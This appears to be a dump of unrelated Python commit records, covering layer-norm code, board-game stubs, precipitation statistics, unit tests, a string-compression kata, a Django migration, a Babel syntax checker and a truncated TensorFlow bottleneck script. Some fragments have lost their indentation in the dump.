def begin_update(self, X, drop=0.):
# forward pass that also returns a backprop callback
X, backprop_child = self.child.begin_update(X, drop=0.)
N, mu, var = _get_moments(self.ops, X)
Xhat = _forward(self.ops, X, mu, var)
y, backprop_rescale = self._begin_update_scale_shift(Xhat)
def finish_update(dy, sgd=None):
# undo scale/shift, then the standard layer-norm gradient:
# d_xhat = (N*dy - sum(dy) - (x-mu)/var * sum(dy*(x-mu))) / (N*sqrt(var))
dy = backprop_rescale(dy, sgd)
dist, sum_dy, sum_dy_dist = _get_d_moments(self.ops, dy, X, mu)
d_xhat = N * dy - sum_dy - dist * var**(-1.) * sum_dy_dist
d_xhat *= var ** (-1. / 2)
d_xhat /= N
return backprop_child(d_xhat, sgd)
# dropout is applied after normalization, scaled by the child's factor
drop *= getattr(self.child, 'drop_factor', 1.0)
y, bp_dropout = self.ops.dropout(y, drop)
assert y.dtype == 'float32'
return y, bp_dropout(finish_update)
def _begin_update_scale_shift(self, input__BI):
# y = G * xhat + b, plus the matching gradient accumulation for G and b
def finish_update(gradient__BI, sgd=None):
self.d_b += gradient__BI.sum(axis=0)
d_G = self.d_G
d_G += (gradient__BI * input__BI).sum(axis=0)
if sgd is not None:
sgd(self._mem.weights, self._mem.gradient, key=self.id)
return gradient__BI * self.G
return input__BI * self.G + self.b, finish_update
def _get_moments(ops, X):
mu = X.mean(axis=1, keepdims=True)
var = X.var(axis=1, keepdims=True) + 1e-08
return X.shape[0], mu, var
def _get_d_moments(ops, dy, X, mu):
dist = X-mu
return dist, ops.xp.sum(dy, axis=1, keepdims=True), ops.xp.sum(dy * dist, axis=1, keepdims=True)
def _forward(ops, X, mu, var):
return (X-mu) * var ** (-1./2.)
| Python | 0 | |
eefa1f039d935a7242bb14bdb6f672db1ff24302 | Create omega-virus.py | omega-virus.py | omega-virus.py | #!/usr/bin/python
#
# Insert docopt user help menu here?
#
#
# End docopt
#
# Design-sketch stubs for the Omega Virus board game.
# Fix: the original stubs were missing ':' and had no function bodies,
# so the module did not parse at all; each stub now compiles and simply
# returns None until it is implemented.

def sectors():
    """Placeholder: the four board sectors."""
    # Blue
    # Green
    # Red
    # Yellow
    pass

def roomList():
    """Placeholder: rooms keyed by required access card colour."""
    # List of rooms
    # Green (open rooms)
    # Blue (requires blue key)
    # Red (requires red key)
    # Yellow (requires yellow key)
    pass

def roomContents():
    """Placeholder: what a room may contain."""
    # Each room can have one of:
    # 1. An ADV
    # 2. An access card
    # 3. A Probe (more on this in a little bit)
    # 4. A hazard
    # 5. The virus (presumably chilling out)
    # 6. Nothing at all
    pass

def items():
    """Placeholder: collectible items and weapons."""
    # Access keys (Blue, Red, Yellow)
    # Decoder - yellow
    # Disruptor - blue
    # Negatron - red
    # Probe
    pass

def players():
    """Placeholder: the four player colours."""
    # Blue
    # Green
    # Red
    # Yellow
    pass

def rng():
    """Placeholder: random number generator producing 0, 1 or 2."""
    # Random number generator
    # Values 0,1,2
    pass

def secretCode():
    """Placeholder: secret-code hints about the virus location."""
    # Secret codes let players know where the virus is provided:
    # a) They enter a room where the virus is
    # b) They do not have all three weapons
    # c) Should we let probes find the virus?
    pass
| Python | 0 | |
2c9ff7a0c84c953b815da9db10cc24bbf34444e0 | Create precipitation.py | precipitation.py | precipitation.py | # -*- coding: utf8 -*-
import os
import numpy as np
from myfunctions import station,stationNo,DATAPATH,days36x
from variables import R
''' 要素 '''
precipitation = ['累计降水量','日降水量大于等于0.1mm日数','日降水量大于等于1mm日数',\
'小雨日数','中雨日数','大雨日数','暴雨日数']
# 定义函数 R_addtod,调用方式如下:
# d = R_addtod(filename,d)
def R_addtod(filename,d):
# Read one month of daily precipitation with R() and append it to the
# running array d.  On any read failure, d becomes the sentinel '' so
# callers know the year is incomplete.
# (R comes from a project module -- presumably returns a 1-D numpy array
# of daily values in 0.1 mm units; TODO confirm against myfunctions.)
try:
x = R(filename)
except (IOError,TypeError,NameError):
d = ''
else:
d = np.hstack((d,x))
return d
''' 定义降水的计算函数 myreadaR
参数 above:表示日降水量大于等于 above
below:表示日降水小于等于 below
daysorsum:"days" 表示计算日数,"sum" 表示计算累计降水量
如统计累计降水量:
year,s = myreadaR('54525',1951,2013,1,12,1,31,0,99999,"sum") # 这里用 99999 表示不可能的大数
返回的 s 单位是 mm 或 d
'''
def myreadaR(stationnumber,startyear,endyear,startmonth,endmonth,startday,endday,above,below,daysorsum):
# Per-year precipitation statistic for one station.
# For each year in [startyear, endyear], daily values for the month/day
# window are collected (crossing the year boundary when the start
# month-day is later than the end month-day).  Values are stored in
# 0.1 mm units; `above`/`below` are given in mm and scaled by 10 below.
# daysorsum: 'sum' -> total precipitation (mm); 'days' -> day count.
# Returns (years array, per-year statistic array; np.nan for years with
# missing months or >= 1/4 missing daily values).
# NOTE(review): the `d == ''` / `d != ''` sentinel comparisons compare a
# numpy array against a string (deprecated elementwise semantics in
# newer numpy); and `daysfit[j-1]` after the loops relies on the last
# value of loop variable j -- fragile but intentional here.
P = os.path.join(DATAPATH,stationnumber)
os.chdir(P)
years = np.arange(startyear,endyear+1)
# s doubles as the result array; iterating it yields the original
# indices 0..n-1 because s[i] is only overwritten at step i
s = np.arange(len(years),dtype=np.float32)
for i in s:
i = int(i)
daysfit = days36x(years[i])
''' 逐月处理,对空字数组 d 开始追加 '''
d = np.arange(0,dtype=np.float32)
if startmonth*100+startday <= endmonth*100+endday:
''' 起始月日早于或等于终止月日,不跨年 '''
months = np.arange(startmonth,endmonth+1)
for j in months:
filename = 'A'+stationnumber+'-'+str(years[i]*100+j)+'.TXT'
d = R_addtod(filename,d)
if d == '': break
else:
''' 起始月日晚于终止月日,跨年 '''
''' 第一年 '''
monthA = np.arange(startmonth,13)
for j in monthA:
filename = 'A'+stationnumber+'-'+str(years[i]*100+j)+'.TXT'
d = R_addtod(filename,d)
if d == '': break
''' 第二年 '''
if d != '':
# first year had a missing month: skip the second year's months
monthB = np.arange(1,endmonth+1)
for j in monthB:
filename = 'A'+stationnumber+'-'+str((years[i]+1)*100+j)+'.TXT'
d = R_addtod(filename,d)
if d == '': break
''' 月处理完毕,开始年处理 '''
if d == '':
s[i] = np.nan
else:
# trim leading days before startday and trailing days after endday
d = d[startday-1:]
if daysfit[j-1]-endday > 0:
d = d[::-1]
d = d[daysfit[j-1]-endday:]
d = d[::-1]
if np.sum(np.isnan(d))*4 >= len(d):
# if the daily missing-value rate is >= 1/4, mark the year missing
s[i] = np.nan
else:
if daysorsum == 'sum':
s[i] = np.nansum((d>above*10)*(d<below*10)*d)
elif daysorsum == 'days':
s[i] = np.sum((d>above*10)*(d<below*10))
if daysorsum == 'sum':
# convert units from 0.1 mm to mm
s = np.rint(s)*0.1
return years,s
''' 定义计算全市平均的函数 myreadaRM,调用方式比 myreadaR 少了参数 stationnumber
返回 years 为年份序列,s 为全市平均序列,z 为各站序列
'''
def myreadaRM(startyear,endyear,startmonth,endmonth,startday,endday,above,below,daysorsum):
# City-wide average: run myreadaR for every station (all but the last
# entry of the project-level `station` list) and average across them.
# Returns (years, per-station matrix z, city-mean series s).
z = np.zeros([len(station)-1,endyear-startyear+1])
n = np.arange(len(station)-1)
for i in n:
stationnumber = str(stationNo[i])
years,data = myreadaR(stationnumber,startyear,endyear,startmonth,endmonth,startday,endday,above,below,daysorsum)
z[i] = data
# nanmean ignores stations whose year was marked missing
s = np.nanmean(z, axis=0)
# keep one decimal place
s = np.rint(s*10)*0.1
return years,z,s
| Python | 0.000082 | |
04f937a24279699164278d47fc5d0790a9062132 | add gunicorn.py | wsgi_gunicorn.py | wsgi_gunicorn.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from werkzeug.contrib.fixers import ProxyFix
from app import create_app
# WSGI entry point for gunicorn: `gunicorn wsgi_gunicorn:app`.
app = create_app()
# trust X-Forwarded-* headers set by the reverse proxy in front of gunicorn
app.wsgi_app = ProxyFix(app.wsgi_app)
# running the module directly starts Flask's development server instead
if __name__ == '__main__':
app.run(host='0.0.0.0')
| Python | 0.007978 | |
6036f03328d4908b268fa1256b552d588dbcbfc8 | Add pytest unit test for Scenario Loop model. Refs #142 | tests/unit/test_scenarioloop.py | tests/unit/test_scenarioloop.py | # -*- coding: utf-8 -*-
"""
radish
~~~~~~
Behavior Driven Development tool for Python - the root from red to green
Copyright: MIT, Timo Furrer <tuxtimo@gmail.com>
"""
from radish.scenarioloop import ScenarioLoop
from radish.iterationscenario import IterationScenario
from radish.background import Background
from radish.stepmodel import Step
def test_creating_simple_scenarioloop():
"""
Test creating a simple ScenarioLoop
"""
# given & when
scenario = ScenarioLoop(1, 'Scenario Loop', 'Iterations', 'I am a Scenario Loop', 'foo.feature', 1, parent=None,
tags=None, preconditions=None, background=None)
# then - constructor stores its arguments and normalises
# None tags/preconditions to empty lists
assert scenario.id == 1
assert scenario.keyword == 'Scenario Loop'
assert scenario.iterations_keyword == 'Iterations'
assert scenario.sentence == 'I am a Scenario Loop'
assert scenario.path == 'foo.feature'
assert scenario.line == 1
assert scenario.parent is None
assert scenario.tags == []
assert scenario.preconditions == []
assert scenario.background is None
def test_building_scenarioloop_scenarios(mocker):
"""
Test building Scenarios from a Scenario Loop
"""
# given
scenario_loop = ScenarioLoop(1, 'Scenario Loop', 'Iterations', 'I am a Scenario Loop', 'foo.feature', 1, parent=None,
tags=None, preconditions=None, background=None)
# add steps (mocked: only sentence and path are read by build_scenarios)
scenario_loop.steps.extend([
mocker.MagicMock(sentence='Given I have 1', path='foo.feature'),
mocker.MagicMock(sentence='And I have 2', path='foo.feature'),
mocker.MagicMock(sentence='When I add those', path='foo.feature')
])
# set iterations
scenario_loop.iterations = 2
# when - build the scenarios
scenario_loop.build_scenarios()
# then - expect 2 built Scenarios
assert len(scenario_loop.scenarios) == 2
# then - expect that Scenarios are of type IterationScenario
assert all(isinstance(x, IterationScenario) for x in scenario_loop.scenarios)
# then - expect sentences suffixed with the iteration number
assert scenario_loop.scenarios[0].sentence == 'I am a Scenario Loop - iteration 0'
assert scenario_loop.scenarios[1].sentence == 'I am a Scenario Loop - iteration 1'
# then - expect the Steps copied unchanged into every iteration
assert scenario_loop.scenarios[0].steps[0].sentence == 'Given I have 1'
assert scenario_loop.scenarios[0].steps[1].sentence == 'And I have 2'
assert scenario_loop.scenarios[0].steps[2].sentence == 'When I add those'
assert scenario_loop.scenarios[1].steps[0].sentence == 'Given I have 1'
assert scenario_loop.scenarios[1].steps[1].sentence == 'And I have 2'
assert scenario_loop.scenarios[1].steps[2].sentence == 'When I add those'
def test_building_scenarioloop_scenarios_with_background(mocker):
"""
Test building Scenarios from a Scenario Loop including a Background
"""
# given
background = Background('Background', 'I am a Background', 'foo.feature', 1, parent=None)
# add some Steps
background.steps.extend([
Step(1, 'Foo', 'foo.feature', 2, background, False),
Step(2, 'Foo', 'foo.feature', 3, background, False)
])
scenario_loop = ScenarioLoop(1, 'Scenario Loop', 'Iterations', 'I am a Scenario Loop', 'foo.feature', 1, parent=None,
tags=None, preconditions=None, background=background)
# add steps (mocked: only sentence and path are read by build_scenarios)
scenario_loop.steps.extend([
mocker.MagicMock(sentence='Given I have 1', path='foo.feature'),
mocker.MagicMock(sentence='And I have 2', path='foo.feature'),
mocker.MagicMock(sentence='When I add those', path='foo.feature')
])
# set iterations
scenario_loop.iterations = 2
# when - build the scenarios
scenario_loop.build_scenarios()
# then - every built iteration gets its own copy of the Background
assert scenario_loop.scenarios[0].background.sentence == 'I am a Background'
assert scenario_loop.scenarios[1].background.sentence == 'I am a Background'
def test_scenarioloop_afterparse_logic(mocker):
    """after_parse() builds the iteration Scenarios and completes the loop."""
    # given - a Scenario Loop without a Background and three mocked Steps
    loop = ScenarioLoop(1, 'Scenario Loop', 'Iterations', 'I am a Scenario Loop', 'foo.feature', 1, parent=None,
                        tags=None, preconditions=None, background=None)
    for sentence in ('Given I have 1', 'And I have 2', 'When I add those'):
        loop.steps.append(mocker.MagicMock(sentence=sentence, path='foo.feature'))
    loop.iterations = 2
    # when - run the post-parse hook
    loop.after_parse()
    # then - one Scenario per iteration was built and the loop is complete
    assert len(loop.scenarios) == 2
    assert loop.complete is True
| Python | 0 | |
d254428e484172ccd0a0763eb989241b08a26c3b | string compress kata second day | string-compress-kata/day-2.py | string-compress-kata/day-2.py | # -*- codeing: utf-8 -*-
class Compressor(object):
    """Run-length encode strings as count/character pairs (e.g. 'aab' -> '2a1b')."""

    def compress(self, toCompress):
        """Return the run-length encoding of *toCompress* ("" for None)."""
        if toCompress is None:
            return ""
        pieces = []
        pos = 0
        total = len(toCompress)
        while pos < total:
            current = toCompress[pos]
            # Advance run_end to the first character different from current.
            run_end = pos + 1
            while run_end < total and toCompress[run_end] == current:
                run_end += 1
            pieces.append(str(run_end - pos))
            pieces.append(current)
            pos = run_end
        return ''.join(pieces)
import unittest
class StringComperssorTest(unittest.TestCase):
    """Behavioural tests for Compressor.compress()."""

    def setUp(self):
        self.compressor = Compressor()

    def test_none_compresses_to_empty_string(self):
        result = self.compressor.compress(None)
        self.assertEqual(result, "")

    def test_one_char_string(self):
        result = self.compressor.compress("a")
        self.assertEqual(result, "1a")

    def test_string_of_unique_chars(self):
        result = self.compressor.compress("abc")
        self.assertEqual(result, "1a1b1c")

    def test_string_of_duobled_chars(self):
        result = self.compressor.compress("aabbcc")
        self.assertEqual(result, "2a2b2c")

    def test_empty_string_compressed_into_empty_string(self):
        result = self.compressor.compress("")
        self.assertEqual(result, "")
| Python | 0.999077 | |
a81f39089b4c60e2cb05ea892afacbcbea6f1c5d | add tests for oxml_parser | tests/oxml/test___init__.py | tests/oxml/test___init__.py | # encoding: utf-8
"""
Test suite for pptx.oxml.__init__.py module, primarily XML parser-related.
"""
from __future__ import print_function, unicode_literals
import pytest
from lxml import etree, objectify
from pptx.oxml import oxml_parser
class DescribeOxmlParser(object):
    """Behaviour of the shared objectify XML parser configuration."""

    def it_enables_objectified_xml_parsing(self, xml_bytes):
        parsed = objectify.fromstring(xml_bytes, oxml_parser)
        assert parsed.bar == 'foobar'

    def it_strips_whitespace_between_elements(self, foo, stripped_xml_bytes):
        serialized = etree.tostring(foo)
        assert serialized == stripped_xml_bytes
# ===========================================================================
# fixtures
# ===========================================================================
@pytest.fixture
def foo(xml_bytes):
    """The objectified root element parsed from the xml_bytes fixture."""
    root = objectify.fromstring(xml_bytes, oxml_parser)
    return root
@pytest.fixture
def stripped_xml_bytes():
    """The fixture document serialized without whitespace between elements."""
    xml = (
        '<a:foo xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/ma'
        'in"><a:bar>foobar</a:bar></a:foo>'
    )
    return xml.encode('utf-8')
@pytest.fixture
def xml_bytes():
    """Pretty-printed XML document for parser tests, as UTF-8 bytes."""
    lines = [
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>',
        '<a:foo xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/ma'
        'in">',
        '  <a:bar>foobar</a:bar>',
        '</a:foo>',
        '',
    ]
    return '\n'.join(lines).encode('utf-8')
| Python | 0.000001 | |
f8c3feaf3f400cbcf3e04d9705f0cb36d083c6d7 | Include migratio for ProductPlan. | conductor/accounts/migrations/0012_productplan.py | conductor/accounts/migrations/0012_productplan.py | # Generated by Django 2.0.9 on 2018-11-08 02:50
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django (see file header); schema-only, no data changes.
    # NOTE(review): avoid editing a migration that may already have been
    # applied somewhere -- add a follow-up migration instead.

    dependencies = [("accounts", "0011_auto_20180831_0320")]

    operations = [
        migrations.CreateModel(
            name="ProductPlan",
            fields=[
                (
                    "id",
                    models.AutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                # Defaults to inactive; presumably gates availability -- confirm.
                ("active", models.BooleanField(default=False)),
                # Identifier of the corresponding plan object on Stripe's side.
                ("stripe_plan_id", models.CharField(max_length=32)),
                ("trial_days", models.IntegerField(default=0)),
            ],
        )
    ]
| Python | 0 | |
886328640f5665c337bb9dd1f065cc0e350364f0 | Convert some cli tests to pytest. | tests/unit/cli/main_test.py | tests/unit/cli/main_test.py | from __future__ import absolute_import
from __future__ import unicode_literals
import logging
import pytest
from compose import container
from compose.cli.errors import UserError
from compose.cli.formatter import ConsoleWarningFormatter
from compose.cli.main import build_log_printer
from compose.cli.main import convergence_strategy_from_opts
from compose.cli.main import setup_console_handler
from compose.service import ConvergenceStrategy
from tests import mock
def mock_container(service, number):
    """Return an autospecced Container mock named '<service>_<number>'."""
    short_name = '{0}_{1}'.format(service, number)
    return mock.create_autospec(
        container.Container,
        service=service,
        number=number,
        name_without_project=short_name)
@pytest.fixture
def logging_handler():
    """A StreamHandler writing to a mock stream that claims to be a TTY."""
    fake_tty = mock.Mock()
    fake_tty.isatty.return_value = True
    return logging.StreamHandler(stream=fake_tty)
class TestCLIMainTestCase(object):
    """build_log_printer attaches the right subset of containers."""

    def test_build_log_printer(self):
        # Only containers belonging to the requested services are attached.
        all_containers = [
            mock_container('web', 1),
            mock_container('web', 2),
            mock_container('db', 1),
            mock_container('other', 1),
            mock_container('another', 1),
        ]
        printer = build_log_printer(
            all_containers, ['web', 'db'], True, False, {'follow': True})
        assert printer.containers == all_containers[:3]

    def test_build_log_printer_all_services(self):
        # An empty service list means "attach everything".
        all_containers = [
            mock_container('web', 1),
            mock_container('db', 1),
            mock_container('other', 1),
        ]
        printer = build_log_printer(
            all_containers, [], True, False, {'follow': True})
        assert printer.containers == all_containers
class TestSetupConsoleHandlerTestCase(object):
    """setup_console_handler picks a formatter from TTY-ness and verbosity."""

    def test_with_tty_verbose(self, logging_handler):
        setup_console_handler(logging_handler, True)
        fmt = logging_handler.formatter
        assert type(fmt) == ConsoleWarningFormatter
        assert '%(name)s' in fmt._fmt
        assert '%(funcName)s' in fmt._fmt

    def test_with_tty_not_verbose(self, logging_handler):
        setup_console_handler(logging_handler, False)
        fmt = logging_handler.formatter
        assert type(fmt) == ConsoleWarningFormatter
        assert '%(name)s' not in fmt._fmt
        assert '%(funcName)s' not in fmt._fmt

    def test_with_not_a_tty(self, logging_handler):
        # Pretend the stream is not a terminal.
        logging_handler.stream.isatty.return_value = False
        setup_console_handler(logging_handler, False)
        assert type(logging_handler.formatter) == logging.Formatter
class TestConvergeStrategyFromOptsTestCase(object):
    """Mapping of --force-recreate/--no-recreate to ConvergenceStrategy."""

    def test_invalid_opts(self):
        # Both flags together are contradictory.
        with pytest.raises(UserError):
            convergence_strategy_from_opts(
                {'--force-recreate': True, '--no-recreate': True})

    def test_always(self):
        strategy = convergence_strategy_from_opts(
            {'--force-recreate': True, '--no-recreate': False})
        assert strategy == ConvergenceStrategy.always

    def test_never(self):
        strategy = convergence_strategy_from_opts(
            {'--force-recreate': False, '--no-recreate': True})
        assert strategy == ConvergenceStrategy.never

    def test_changed(self):
        strategy = convergence_strategy_from_opts(
            {'--force-recreate': False, '--no-recreate': False})
        assert strategy == ConvergenceStrategy.changed
| from __future__ import absolute_import
from __future__ import unicode_literals
import logging
from compose import container
from compose.cli.errors import UserError
from compose.cli.formatter import ConsoleWarningFormatter
from compose.cli.main import build_log_printer
from compose.cli.main import convergence_strategy_from_opts
from compose.cli.main import setup_console_handler
from compose.service import ConvergenceStrategy
from tests import mock
from tests import unittest
def mock_container(service, number):
    """Autospecced Container mock for *service* instance *number*."""
    return mock.create_autospec(
        container.Container,
        number=number,
        service=service,
        name_without_project='{0}_{1}'.format(service, number))
class CLIMainTestCase(unittest.TestCase):
    """build_log_printer attaches the right subset of containers."""

    def test_build_log_printer(self):
        all_containers = [
            mock_container('web', 1),
            mock_container('web', 2),
            mock_container('db', 1),
            mock_container('other', 1),
            mock_container('another', 1),
        ]
        printer = build_log_printer(
            all_containers, ['web', 'db'], True, False, {'follow': True})
        self.assertEqual(printer.containers, all_containers[:3])

    def test_build_log_printer_all_services(self):
        # An empty service list means "attach everything".
        all_containers = [
            mock_container('web', 1),
            mock_container('db', 1),
            mock_container('other', 1),
        ]
        printer = build_log_printer(
            all_containers, [], True, False, {'follow': True})
        self.assertEqual(printer.containers, all_containers)
class SetupConsoleHandlerTestCase(unittest.TestCase):
    """setup_console_handler picks a formatter from TTY-ness and verbosity."""

    def setUp(self):
        # Handler writing to a mock stream that claims to be a TTY.
        self.stream = mock.Mock()
        self.stream.isatty.return_value = True
        self.handler = logging.StreamHandler(stream=self.stream)

    def test_with_tty_verbose(self):
        setup_console_handler(self.handler, True)
        fmt = self.handler.formatter
        assert type(fmt) == ConsoleWarningFormatter
        assert '%(name)s' in fmt._fmt
        assert '%(funcName)s' in fmt._fmt

    def test_with_tty_not_verbose(self):
        setup_console_handler(self.handler, False)
        fmt = self.handler.formatter
        assert type(fmt) == ConsoleWarningFormatter
        assert '%(name)s' not in fmt._fmt
        assert '%(funcName)s' not in fmt._fmt

    def test_with_not_a_tty(self):
        # Pretend the stream is not a terminal.
        self.stream.isatty.return_value = False
        setup_console_handler(self.handler, False)
        assert type(self.handler.formatter) == logging.Formatter
class ConvergeStrategyFromOptsTestCase(unittest.TestCase):
    """Mapping of --force-recreate/--no-recreate to ConvergenceStrategy."""

    def test_invalid_opts(self):
        # Both flags together are contradictory.
        with self.assertRaises(UserError):
            convergence_strategy_from_opts(
                {'--force-recreate': True, '--no-recreate': True})

    def test_always(self):
        strategy = convergence_strategy_from_opts(
            {'--force-recreate': True, '--no-recreate': False})
        self.assertEqual(strategy, ConvergenceStrategy.always)

    def test_never(self):
        strategy = convergence_strategy_from_opts(
            {'--force-recreate': False, '--no-recreate': True})
        self.assertEqual(strategy, ConvergenceStrategy.never)

    def test_changed(self):
        strategy = convergence_strategy_from_opts(
            {'--force-recreate': False, '--no-recreate': False})
        self.assertEqual(strategy, ConvergenceStrategy.changed)
| Python | 0.999992 |
4db13bdab18934bebcfe5b102044f936e0eab892 | Add a place to put random stuff and a list of components as a python module. | etc/component_list.py | etc/component_list.py | COMPONENTS = [
    # OCRopus/ocrolib component names.  The list mixes CamelCase class names
    # with lowercase factory aliases.
    # NOTE(review): maintained by hand -- confirm against the components
    # actually registered in ocrolib before relying on completeness.
    "AdaBoost",
    "AutoInvert",
    "AutoMlpClassifier",
    "BiggestCcExtractor",
    "BinarizeByHT",
    "BinarizeByOtsu",
    "BinarizeByRange",
    "BinarizeBySauvola",
    "BitDataset",
    "BitNN",
    "BookStore",
    "CascadedMLP",
    "CenterFeatureMap",
    "ConnectedComponentSegmenter",
    "CurvedCutSegmenter",
    "CurvedCutWithCcSegmenter",
    "Degradation",
    "DeskewGrayPageByRAST",
    "DeskewPageByRAST",
    "DocClean",
    "DpSegmenter",
    "EnetClassifier",
    "EuclideanDistances",
    "KnnClassifier",
    "LatinClassifier",
    "Linerec",
    "LinerecExtracted",
    "MetaLinerec",
    "NullLinerec",
    "OcroFST",
    "OldBookStore",
    "PageFrameRAST",
    "Pages",
    "RaggedDataset8",
    "RaveledExtractor",
    "RmBig",
    "RmHalftone",
    "RmUnderline",
    "RowDataset8",
    "ScaledImageExtractor",
    "SegmentLineByCCS",
    "SegmentLineByGCCS",
    "SegmentLineByProjection",
    "SegmentPageBy1CP",
    "SegmentPageByMorphTrivial",
    "SegmentPageByRAST",
    "SegmentPageByRAST1",
    "SegmentPageByVORONOI",
    "SegmentPageByXYCUTS",
    "SegmentWords",
    "SimpleFeatureMap",
    "SimpleGrouper",
    "SkelSegmenter",
    "SmartBookStore",
    "SqliteBuffer",
    "SqliteDataset",
    "StandardExtractor",
    "StandardGrouper",
    "StandardPreprocessing",
    "TextImageSegByLogReg",
    "adaboost",
    "biggestcc",
    "bitdataset",
    "bitnn",
    "cfmap",
    "cmlp",
    "dpseg",
    "edist",
    "enet",
    "knn",
    "latin",
    "linerec",
    "linerec_extracted",
    "mappedmlp",
    "metalinerec",
    "mlp",
    "nulllinerec",
    "raggeddataset8",
    "raveledfe",
    "rowdataset8",
    "scaledfe",
    "sfmap",
    "simplegrouper",
    "sqlitebuffer",
    "sqliteds",
    ]
| Python | 0 | |
f7aeb7a708ef2e40546d27d480073fdc113d639e | Add check_babel_syntax ; see note below | unnaturalcode/check_babel_syntax.py | unnaturalcode/check_babel_syntax.py | #!/usr/bin/python
# Copyright 2017 Dhvani Patel
#
# This file is part of UnnaturalCode.
#
# UnnaturalCode is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# UnnaturalCode is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with UnnaturalCode. If not, see <http://www.gnu.org/licenses/>.
# Takes in a string of JavaScript code and checks for errors
# NOTE: FOR BABEL
import os
import subprocess
import sys
import tempfile
from compile_error import CompileError
# Method for finding index of certain characters in a string, n being the n'th occurence of the character/string
def find_nth(haystack, needle, n):
    """Return the index of the n'th occurrence of *needle* in *haystack*.

    Occurrences are counted without overlap; -1 is returned when there are
    fewer than *n* occurrences.
    """
    position = haystack.find(needle)
    remaining = n
    while remaining > 1 and position >= 0:
        position = haystack.find(needle, position + len(needle))
        remaining -= 1
    return position
# Main method
def checkBabelSyntax(src):
    """Feed JavaScript *src* through Babel and report syntax errors.

    Returns None when Babel compiles the source cleanly, otherwise a
    one-element list holding a CompileError for the first reported error.
    """
    # Babel reads from disk, so the source goes to a scratch file in the
    # working directory (the parsed fileName below relies on this name).
    with open("toCheck.js", "w") as js_file:
        js_file.write(src)
    try:
        proc = subprocess.Popen(['node_modules/.bin/babel', 'toCheck.js', '-o', '/dev/null'], stderr=subprocess.PIPE)
        streamdata, err = proc.communicate()
        rc = proc.returncode
        if rc == 0:
            # No errors, all good
            return None
        # Error: dissect Babel's stderr, which starts like
        #   SyntaxError: toCheck.js: <message> (line:column)
        colonFirInd = find_nth(err, ':', 1)
        colonSecInd = find_nth(err, ':', 2)
        colonThirInd = find_nth(err, ':', 3)
        lineBegin = find_nth(err, '(', 1)
        lineEnd = find_nth(err, ')', 1)
        fileName = err[colonFirInd+2:colonSecInd]
        line = int(err[lineBegin+1:colonThirInd])
        column = int(err[colonThirInd+1:lineEnd])
        errorname = err[0:colonFirInd]
        # '>' marks the offending source line in Babel's code frame.
        flagStart = find_nth(err, '>', 1)
        temp = err[flagStart:]
        ind = find_nth(temp, '\n', 1)
        textBefore = err[colonSecInd+2:lineBegin-1]
        textAfter = err[flagStart+26:flagStart+ind]
        text = textBefore + ' ' + textAfter
        errorObj = CompileError(fileName, line, column, None, text, errorname)
        return [errorObj]
    finally:
        # Previously the scratch file leaked whenever the stderr parsing
        # raised (e.g. unexpected Babel output); always clean it up now.
        os.remove("toCheck.js")
| Python | 0 | |
3196eeb928c5715ba20d21d0d16a3087938bf6c9 | Add tools/compute_bottleneck.py. | tools/compute_bottleneck.py | tools/compute_bottleneck.py | #!/usr/bin/env python
#
# Copyright 2016 The Open Images Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
#
# This script takes an Inception v3 checkpoint, runs the classifier
# on the image and prints the values from the bottleneck layer.
# Example:
# $ wget -O /tmp/cat.jpg https://farm6.staticflickr.com/5470/9372235876_d7d69f1790_b.jpg
# $ ./tools/compute_bottleneck.py /tmp/cat.jpg
#
# Make sure to download the ANN weights and support data with:
# $ ./tools/download_data.sh
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import math
import sys
import os.path
import numpy as np
import tensorflow as tf
from tensorflow.contrib.slim.python.slim.nets import inception
from tensorflow.python.framework import ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import variables
from tensorflow.python.training import saver as tf_saver
from tensorflow.python.training import supervisor
# Shorthand for the TF-Slim API shipped inside tf.contrib.
slim = tf.contrib.slim
# Populated by argparse in the __main__ block before tf.app.run() calls main().
FLAGS = None
def PreprocessImage(image_path):
  """Load and preprocess an image.

  Builds the graph ops that decode the JPEG at *image_path*, resize it to
  FLAGS.image_size x FLAGS.image_size and rescale pixel values from
  [0, 255] to [-1, 1].

  Args:
    image_path: path to an image

  Returns:
    An ops.Tensor that produces the preprocessed image.
  """
  if not os.path.exists(image_path):
    tf.logging.fatal('Input image does not exist %s', image_path)
  img_data = tf.gfile.FastGFile(image_path).read()
  # Decode Jpeg data and convert to float.
  img = tf.cast(tf.image.decode_jpeg(img_data, channels=3), tf.float32)
  # Make into a 4D tensor by setting a 'batch size' of 1.
  img = tf.expand_dims(img, [0])
  img = tf.image.crop_and_resize(
      img,
      # Whole image
      tf.constant([0, 0, 1.0, 1.0], shape=[1, 4]),
      # One box
      tf.constant([0], shape=[1]),
      # Target size is image_size x image_size
      tf.constant([FLAGS.image_size, FLAGS.image_size], shape=[2]))
  # Center the image about 128.0 (which is done during training) and normalize.
  # NOTE(review): tf.mul/tf.sub are pre-1.0 TensorFlow op names; the whole
  # script targets that 2016-era API.
  img = tf.mul(img, 1.0/127.5)
  return tf.sub(img, 1.0)
def main(args):
  """Restore the checkpoint, run one image through Inception v3 and print
  the 'PreLogits' bottleneck values to stdout as comma-separated floats.

  Args:
    args: unused positional arguments forwarded by tf.app.run().
  """
  if not os.path.exists(FLAGS.checkpoint):
    tf.logging.fatal(
        'Checkpoint %s does not exist. Have you download it? See tools/download_data.sh',
